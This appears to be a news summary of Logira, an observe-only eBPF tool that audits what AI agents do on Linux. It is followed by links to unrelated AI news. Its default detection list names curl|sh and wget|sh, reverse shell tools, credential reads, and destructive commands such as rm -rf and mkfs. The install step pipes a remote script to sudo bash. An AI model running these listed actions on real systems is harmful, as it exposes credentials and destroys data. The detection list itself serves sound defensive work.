Logira: eBPF Runtime Auditing for AI Agent Runs
Logira is an eBPF-based runtime auditing tool for Linux that tracks what AI agents and automation actually do at the OS level. It records process execution, file activity, and network activity using cgroup v2 run-scoped tracking, attributing events to single audited runs.
Key Features
The tool provides per-run local storage in both JSONL and SQLite formats for timeline review and querying. It includes default detection rules focused on AI agent auditing, with optional custom YAML rules. Logira is observe-only by design—it records and detects but never blocks or enforces.
Default Detections
- Credential and secrets writes:
~/.ssh,~/.aws, kube/gcloud/docker config,.netrc,.git-credentials, registry creds - Sensitive credential reads: SSH private keys, AWS credentials/config, kubeconfig, docker config,
.netrc,.git-credentials - Persistence and config changes: writes under
/etc, systemd units, cron, user autostart entries, shell startup files - Temp droppers: executable files created under
/tmp,/dev/shm,/var/tmp - Suspicious exec patterns:
curl|sh,wget|sh, tunneling/reverse shell tools and flags, base64 decode with shell hints - Agent safety destructive patterns:
rm -rf,git clean -fdx,find -delete,mkfs,terraform destroy, and similar commands - Network egress: suspicious destination ports and cloud metadata endpoint access
Installation
Recommended installation via script:
curl -fsSL https://raw.githubusercontent.com/melonattacker/logira/main/install.sh | sudo bashOr manual install from release tarball:
tar -xzf logira_vX.Y.Z_linux-<arch>.tar.gz
cd logira_vX.Y.Z_linux-<arch>
sudo ./install-local.shAfter installation or upgrade, restart the daemon:
sudo systemctl daemon-reload
sudo systemctl restart logirad.service
sudo systemctl status logirad.service --no-pagerHow to Run
The root daemon logirad runs via systemd. Installation steps include:
# 1) Generate eBPF objects (only needed if missing)
make generate
2) Install the systemd unit
sudo install -D -m 0644 packaging/systemd/logirad.service /etc/systemd/system/logirad.service
3) Install the daemon binary (unit defaults to /usr/local/bin/logirad)
sudo install -m 0755 ./logirad /usr/local/bin/logirad
4) (Recommended) Point systemd at the eBPF .o files via an environment file
sudo mkdir -p /etc/logira
sudo tee /etc/logira/logirad.env > /dev/null << 'EOF'
LOGIRA_EXEC_BPF_OBJ=/absolute/path/to/collector/linux
Custom rules can be appended per-run with logira run --rules <file>.
📖 Read the full source: HN AI Agents
👀 See Also
Open-Source Web UI for Parallel Claude Code Sessions Using Git Worktree
A developer has built an open-source web UI called CCUI that enables running multiple Claude Code sessions in parallel using git worktree. It runs as a local web server accessible via browser and supports SSH port forwarding for remote development.
Savant Commander 48B: A Custom Qwen 3 Mixture-of-Experts Model with 12 Distilled Models
Savant Commander 48B is a custom Qwen 3 Mixture-of-Experts model with hand-coded routing that combines 12 distilled models from providers like Claude, Gemini, OpenAI, and Deepseek. It features 256K context length and allows prompt-controlled activation of specific distilled models.
Qwen 3.6 27B with MTP on V100 32GB: 54 t/s via llama.cpp Branch
am17an's MTP branch of llama.cc runs Qwen 3.6 27B at 54 t/s on V100 32GB via PCIe adapter, dropping to 29-30 t/s without MTP.
Codex Chrome Extension Adds Background Browser Automation Across Tabs
Codex's new Chrome extension on macOS/Windows enables parallel browser task execution in background tabs without taking over the browser — covering debugging flows, dashboards, research, and CRM updates.